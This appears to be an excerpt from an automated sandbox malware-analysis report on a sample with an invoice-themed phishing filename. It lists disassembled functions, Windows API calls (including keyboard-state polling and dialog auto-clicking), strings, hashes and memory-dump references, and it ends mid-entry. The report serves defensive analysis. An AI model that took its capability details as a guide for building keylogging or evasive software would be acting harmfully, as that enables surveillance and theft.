                    • Instruction Fuzzy Hash: A311E22155016D79D720B663CC8ACFF7BBCEF91F14F501469B448B20D1EE618D05CAA2
                    Function 00EE48F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                    • String ID: 0.0.0.0
                    • API String ID: 208665112-3771769585
                    • Opcode ID: 1cd24f9b2fea91dfd8b5a8d2772161243729b2654f6b494bf7ecd1c0db75a035
                    • Instruction ID: c81419d2cb6ed62ae2a80404059c431a4c2d9cd590fbc0ac4f07fb245673c314
                    • Opcode Fuzzy Hash: 1cd24f9b2fea91dfd8b5a8d2772161243729b2654f6b494bf7ecd1c0db75a035
                    • Instruction Fuzzy Hash: 5C11057190411DAFCB20EB259C46EDB77ECAB85710F0011B6F504B6092EFB19A85A662
                    Function 00EE5217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • timeGetTime.WINMM ref: 00EE521C
                      • Part of subcall function 00EA0719: timeGetTime.WINMM(?,7608B400,00E90FF9), ref: 00EA071D
                    • Sleep.KERNEL32(0000000A), ref: 00EE5248
                    • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00EE526C
                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00EE528E
                    • SetActiveWindow.USER32 ref: 00EE52AD
                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00EE52BB
                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00EE52DA
                    • Sleep.KERNEL32(000000FA), ref: 00EE52E5
                    • IsWindow.USER32 ref: 00EE52F1
                    • EndDialog.USER32(00000000), ref: 00EE5302
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                    • String ID: BUTTON
                    • API String ID: 1194449130-3405671355
                    • Opcode ID: 99db3ef86b03a64cce27802a2d872df3ca0e42fdcfcefe176ae6ef5b7413f9aa
                    • Instruction ID: 1fe378077799d971ee8f4c6046e09f4d6757b4ab406bd1aef1b664c8b27b41da
                    • Opcode Fuzzy Hash: 99db3ef86b03a64cce27802a2d872df3ca0e42fdcfcefe176ae6ef5b7413f9aa
                    • Instruction Fuzzy Hash: BA21F67510474CAFE7106F31EC89B263B69FB2A34EF082424F901E65B5DBB19D04BB62
                    Function 00EE052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • GetKeyboardState.USER32(?), ref: 00EE05A7
                    • SetKeyboardState.USER32(?), ref: 00EE0612
                    • GetAsyncKeyState.USER32(000000A0), ref: 00EE0632
                    • GetKeyState.USER32(000000A0), ref: 00EE0649
                    • GetAsyncKeyState.USER32(000000A1), ref: 00EE0678
                    • GetKeyState.USER32(000000A1), ref: 00EE0689
                    • GetAsyncKeyState.USER32(00000011), ref: 00EE06B5
                    • GetKeyState.USER32(00000011), ref: 00EE06C3
                    • GetAsyncKeyState.USER32(00000012), ref: 00EE06EC
                    • GetKeyState.USER32(00000012), ref: 00EE06FA
                    • GetAsyncKeyState.USER32(0000005B), ref: 00EE0723
                    • GetKeyState.USER32(0000005B), ref: 00EE0731
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: State$Async$Keyboard
                    • String ID:
                    • API String ID: 541375521-0
                    • Opcode ID: badd9aa828def223a95a1b8bc44d6a29cdd64372db683193cb4aa836a485d35b
                    • Instruction ID: d75c2f16423d8d058da6caee4b25bd4691dc1c0452bf4e7d88e7865184d3ed30
                    • Opcode Fuzzy Hash: badd9aa828def223a95a1b8bc44d6a29cdd64372db683193cb4aa836a485d35b
                    • Instruction Fuzzy Hash: A251D970A047CC19FB35EBA188547EABFF49F01384F08559A95C2765C2DAE49BCCCB61
                    Function 00EDC72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                    Download Yara Rule
                    APIs
                    • GetDlgItem.USER32(?,00000001), ref: 00EDC746
                    • GetWindowRect.USER32(00000000,?), ref: 00EDC758
                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00EDC7B6
                    • GetDlgItem.USER32(?,00000002), ref: 00EDC7C1
                    • GetWindowRect.USER32(00000000,?), ref: 00EDC7D3
                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00EDC827
                    • GetDlgItem.USER32(?,000003E9), ref: 00EDC835
                    • GetWindowRect.USER32(00000000,?), ref: 00EDC846
                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00EDC889
                    • GetDlgItem.USER32(?,000003EA), ref: 00EDC897
                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00EDC8B4
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00EDC8C1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Window$ItemMoveRect$Invalidate
                    • String ID:
                    • API String ID: 3096461208-0
                    • Opcode ID: 26f05756d31a5252f75f4f8f0c382318d17b68849e9554ba1b74d6a6e8694bea
                    • Instruction ID: 014e750beb16fe409623332eef42b35b069d5f770033ccc041f59de917ffe095
                    • Opcode Fuzzy Hash: 26f05756d31a5252f75f4f8f0c382318d17b68849e9554ba1b74d6a6e8694bea
                    • Instruction Fuzzy Hash: 3B514275B00209AFDB18CF68DD85AAEBBBAFB88310F14812DF515E7290D770AD05DB10
                    Function 00E821A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E825DB: GetWindowLongW.USER32(?,000000EB), ref: 00E825EC
                    • GetSysColor.USER32(0000000F), ref: 00E821D3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ColorLongWindow
                    • String ID:
                    • API String ID: 259745315-0
                    • Opcode ID: 69bce86a23bb92c4649d924526b286cd48819721bde072b34026a87c78387461
                    • Instruction ID: bf2ab0ecd9e385a8fe99921a9f3fb135e8a77d3d95539fa78d77bfbf459665aa
                    • Opcode Fuzzy Hash: 69bce86a23bb92c4649d924526b286cd48819721bde072b34026a87c78387461
                    • Instruction Fuzzy Hash: 4141A331104144AFDB256F68EC48BB93B65FB06335F285269FE6DAA1F2C7318C42EB51
                    Function 00EEAB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                    Download Yara Rule
                    APIs
                    • CharLowerBuffW.USER32(?,?,00F0F910), ref: 00EEAB76
                    • GetDriveTypeW.KERNEL32(00000061,00F3A620,00000061), ref: 00EEAC40
                    • _wcscpy.LIBCMT ref: 00EEAC6A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: BuffCharDriveLowerType_wcscpy
                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                    • API String ID: 2820617543-1000479233
                    • Opcode ID: 632b63cdc5478904f3dd71ea8455c5624370b05433e470f6c7b61be0043a4994
                    • Instruction ID: cbe5dbe95e006a68367ddd03723550236ecf9a23ad4d3d3d808e480bbeadb0d4
                    • Opcode Fuzzy Hash: 632b63cdc5478904f3dd71ea8455c5624370b05433e470f6c7b61be0043a4994
                    • Instruction Fuzzy Hash: BD51AF311083459BC714EF15C881AAAB7E5EF85314F18682DF49ABB2A2DB31ED49CB53
                    Function 00E89997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: __i64tow__itow__swprintf
                    • String ID: %.15g$0x%p$False$True
                    • API String ID: 421087845-2263619337
                    • Opcode ID: b6c61f80134e4b05464f1082298680adae0be056eac29949300943f73428451b
                    • Instruction ID: f84bb826110476b03327f31be0779ef63cf84629bd4c647fbd30b0d0add98501
                    • Opcode Fuzzy Hash: b6c61f80134e4b05464f1082298680adae0be056eac29949300943f73428451b
                    • Instruction Fuzzy Hash: 01411631A04205AEDB24EB78DC41EB773E8EF89314F2454AEF54DF6292EA71E8418711
                    Function 00F073C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00F073D9
                    • CreateMenu.USER32 ref: 00F073F4
                    • SetMenu.USER32(?,00000000), ref: 00F07403
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F07490
                    • IsMenu.USER32(?), ref: 00F074A6
                    • CreatePopupMenu.USER32 ref: 00F074B0
                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F074DD
                    • DrawMenuBar.USER32 ref: 00F074E5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                    • String ID: 0$F
                    • API String ID: 176399719-3044882817
                    • Opcode ID: 0f5ca80343672d47ffb889bf133490814ebb3716d1910ecd13c39b8d03b74fef
                    • Instruction ID: 569c6818aea54fe8a2241d5dfe664687c935887ab4f9115c5020e9632e9968d7
                    • Opcode Fuzzy Hash: 0f5ca80343672d47ffb889bf133490814ebb3716d1910ecd13c39b8d03b74fef
                    • Instruction Fuzzy Hash: 91413879A00349EFDB20EF64D884AAABBF5FF49310F144069FD55A73A0D731A924EB50
                    Function 00F0772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                    Download Yara Rule
                    APIs
                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00F077CD
                    • CreateCompatibleDC.GDI32(00000000), ref: 00F077D4
                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00F077E7
                    • SelectObject.GDI32(00000000,00000000), ref: 00F077EF
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F077FA
                    • DeleteDC.GDI32(00000000), ref: 00F07803
                    • GetWindowLongW.USER32(?,000000EC), ref: 00F0780D
                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00F07821
                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00F0782D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                    • String ID: static
                    • API String ID: 2559357485-2160076837
                    • Opcode ID: cf47acd65c46415072a79650a89a69e499f0b0fbbb885affd3ef324257e896e4
                    • Instruction ID: 95bf0a261b782b1bac333b0da54dfe98d945f66b9894dbc2fbe45708a2623c1a
                    • Opcode Fuzzy Hash: cf47acd65c46415072a79650a89a69e499f0b0fbbb885affd3ef324257e896e4
                    • Instruction Fuzzy Hash: D3317031505219BBDF21AF64DC08FDA3BA9FF09761F114224FA15A60E0C735E825FBA4
                    Function 00EA7040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00EA707B
                      • Part of subcall function 00EA8D68: __getptd_noexit.LIBCMT ref: 00EA8D68
                    • __gmtime64_s.LIBCMT ref: 00EA7114
                    • __gmtime64_s.LIBCMT ref: 00EA714A
                    • __gmtime64_s.LIBCMT ref: 00EA7167
                    • __allrem.LIBCMT ref: 00EA71BD
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EA71D9
                    • __allrem.LIBCMT ref: 00EA71F0
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EA720E
                    • __allrem.LIBCMT ref: 00EA7225
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EA7243
                    • __invoke_watson.LIBCMT ref: 00EA72B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                    • String ID:
                    • API String ID: 384356119-0
                    • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                    • Instruction ID: f0fcc78370526dcf3584963edbf503dfc98c2431918715f7d84a270982b40a75
                    • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                    • Instruction Fuzzy Hash: 6671CAB1A04716ABD714DE79CC8179BB7E8AF1A324F14523AF554FA281E770F9408790
                    Function 00EE2A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00EE2A31
                    • GetMenuItemInfoW.USER32(00F46890,000000FF,00000000,00000030), ref: 00EE2A92
                    • SetMenuItemInfoW.USER32(00F46890,00000004,00000000,00000030), ref: 00EE2AC8
                    • Sleep.KERNEL32(000001F4), ref: 00EE2ADA
                    • GetMenuItemCount.USER32(?), ref: 00EE2B1E
                    • GetMenuItemID.USER32(?,00000000), ref: 00EE2B3A
                    • GetMenuItemID.USER32(?,-00000001), ref: 00EE2B64
                    • GetMenuItemID.USER32(?,?), ref: 00EE2BA9
                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EE2BEF
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EE2C03
                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EE2C24
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                    • String ID:
                    • API String ID: 4176008265-0
                    • Opcode ID: 323bff6defbabce34f2ef3312d4ca9225aaef01dfd2a3de18418741f9fe26aa1
                    • Instruction ID: 16fc07d01070a59204a394e26ed519f3f1540654067ea62d332f4514b4048760
                    • Opcode Fuzzy Hash: 323bff6defbabce34f2ef3312d4ca9225aaef01dfd2a3de18418741f9fe26aa1
                    • Instruction Fuzzy Hash: A5617CB090028DAFDB21CF65CC88ABEBBBCFB41308F14556DEA41A7251D771AD45EB21
                    Function 00F07192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F07214
                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F07217
                    • GetWindowLongW.USER32(?,000000F0), ref: 00F0723B
                    • _memset.LIBCMT ref: 00F0724C
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F0725E
                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F072D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend$LongWindow_memset
                    • String ID:
                    • API String ID: 830647256-0
                    • Opcode ID: 1462a9553875f48afb76b234c88f52c247f96f1677b326778094096736f2b9ee
                    • Instruction ID: aeb64efceb8cf3a9e8579c982b9e5f0c12d3171a9fec153b459a3db09756f1a5
                    • Opcode Fuzzy Hash: 1462a9553875f48afb76b234c88f52c247f96f1677b326778094096736f2b9ee
                    • Instruction Fuzzy Hash: 0C613975900308AFDB20EFA4CC81EEE77F8AB09714F144199FA15E72E1D774A945EB60
                    Function 00ED710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                    Download Yara Rule
                    APIs
                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00ED7135
                    • SafeArrayAllocData.OLEAUT32(?), ref: 00ED718E
                    • VariantInit.OLEAUT32(?), ref: 00ED71A0
                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00ED71C0
                    • VariantCopy.OLEAUT32(?,?), ref: 00ED7213
                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00ED7227
                    • VariantClear.OLEAUT32(?), ref: 00ED723C
                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00ED7249
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00ED7252
                    • VariantClear.OLEAUT32(?), ref: 00ED7264
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00ED726F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                    • String ID:
                    • API String ID: 2706829360-0
                    • Opcode ID: 45290da3dae0fd8dbbf932717d8d9457ff8bd360a0e4543f8fb5e19dce8bc56e
                    • Instruction ID: 5b94f6944a0e2c81bdf778cca14ad79ce52db088b75ef12a964bca18d34103fd
